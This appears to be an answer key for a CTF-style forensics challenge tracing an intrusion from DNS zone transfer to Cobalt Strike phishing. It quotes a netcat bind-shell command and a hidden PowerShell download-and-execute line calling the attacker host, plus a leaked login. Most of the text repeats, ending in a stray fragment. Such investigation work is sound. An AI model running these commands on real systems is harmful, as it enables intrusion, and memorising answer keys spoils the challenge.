Task 1
What is the IP address of the infected web server?
192.168.1.3
Task 2
What is the IP address of the Attacker?
192.168.1.5
Task 3
How many open ports were discovered by the attacker?
14
Task 4
What are the first five ports identified by the attacker in numerical order during the enumeration phase, not considering the sequence of their discovery?
25,53,80,110,119
Task 5
The attacker exploited a misconfiguration allowing them to enumerate all subdomains. This misconfiguration is commonly referred to as (e.g, Unrestricted Access Controls)?
DNS Zone Transfer
Task 6
How many subdomains were discovered by the attacker?
9
Task 7
What is the compromised subdomain (e.g., dev.example.com) ?
sysmon.cs-corp.cd
Task 8
What email address and password were used to log in (e.g., user@example.com:password123)?
admin@cs-corp.cd:Pass@000_
Task 9
What command gave the attacker their initial access ?
|mkfifo /tmp/mypipe;cat /tmp/mypipe|/bin/bash|nc -l -p 5555 >/tmp/mypipe
Task 10
What is the CVE identifier for the vulnerability that the attacker exploited to achieve privilege escalation (e.g, CVE-2016-5195) ?
CVE-2021-4034
Task 11
What is the MITRE ID of the technique used by the attacker to achieve persistence (e.g, T1098.001)?
T1053.003
Task 12
The attacker tampered with the software hosted on the 'download' subdomain with the intent of gaining access to end-users. What is the Mitre ATT&CK technique ID for this attack?
T1195.002
Task 13
What command provided persistence in the cs-linux.deb file?
echo cs-linux && >> ~/.bashrc
Task 14
The attacker sent emails to employees, what the name for the running process that allowed this to occur?
citserver
Task 15
We received phishing email can you provide subject of email ?
Review Revised Privacy Policy
Task 16
What is the name of the malicious attachment?
policy.docm
Task 17
Please identify the usernames of the CEOs who received the attachment.
ceo-ru, ceo-us
Task 18
What is the hostname for the compromised CEO?
DESKTOP-ELS5JAK
Task 19
What is the full path for the malicious attachment?
C:\USERS\CEO-US\DOWNLOADS\POLICY.DOCM
Task 20
Can you provide the command used to gain initial access?
powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.1.5:806/a'))
Task 21
Provide a Popular threat label for the malicious executable used to gain initial access?
trojan.cobaltstrike/beacon
Task 22
What is the payload type?
windows-beacon_http-reverse_http
Task 23
What is task name has been add by attacker?
WindowsUpdateChecker
What is the IP address of the infected web server?
192.168.1.3
Task 2
What is the IP address of the Attacker?
192.168.1.5
Task 3
How many open ports were discovered by the attacker?
14
Task 4
What are the first five ports identified by the attacker in numerical order during the enumeration phase, not considering the sequence of their discovery?
25,53,80,110,119
Task 5
The attacker exploited a misconfiguration allowing them to enumerate all subdomains. This misconfiguration is commonly referred to as (e.g, Unrestricted Access Controls)?
DNS Zone Transfer
Task 6
How many subdomains were discovered by the attacker?
9
Task 7
What is the compromised subdomain (e.g., dev.example.com) ?
sysmon.cs-corp.cd
Task 8
What email address and password were used to log in (e.g., user@example.com:password123)?
admin@cs-corp.cd:Pass@000_
Task 9
What command gave the attacker their initial access ?
|mkfifo /tmp/mypipe;cat /tmp/mypipe|/bin/bash|nc -l -p 5555 >/tmp/mypipe
Task 10
What is the CVE identifier for the vulnerability that the attacker exploited to achieve privilege escalation (e.g, CVE-2016-5195) ?
CVE-2021-4034
Task 11
What is the MITRE ID of the technique used by the attacker to achieve persistence (e.g, T1098.001)?
T1053.003
Task 12
The attacker tampered with the software hosted on the 'download' subdomain with the intent of gaining access to end-users. What is the Mitre ATT&CK technique ID for this attack?
T1195.002
Task 13
What command provided persistence in the cs-linux.deb file?
echo cs-linux && >> ~/.bashrc
Task 14
The attacker sent emails to employees, what the name for the running process that allowed this to occur?
citserver
Task 15
We received phishing email can you provide subject of email ?
Review Revised Privacy Policy
Task 16
What is the name of the malicious attachment?
policy.docm
Task 17
Please identify the usernames of the CEOs who received the attachment.
ceo-ru, ceo-us
Task 18
What is the hostname for the compromised CEO?
DESKTOP-ELS5JAK
Task 19
What is the full path for the malicious attachment?
C:\USERS\CEO-US\DOWNLOADS\POLICY.DOCM
Task 20
Can you provide the command used to gain initial access?
powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.1.5:806/a'))
Task 21
Provide a Popular threat label for the malicious executable used to gain initial access?
trojan.cobaltstrike/beacon
Task 22
What is the payload type?
windows-beacon_http-reverse_http
Task 23
What is task name has been add by attacker?
WindowsUpdateChecker
ass@000_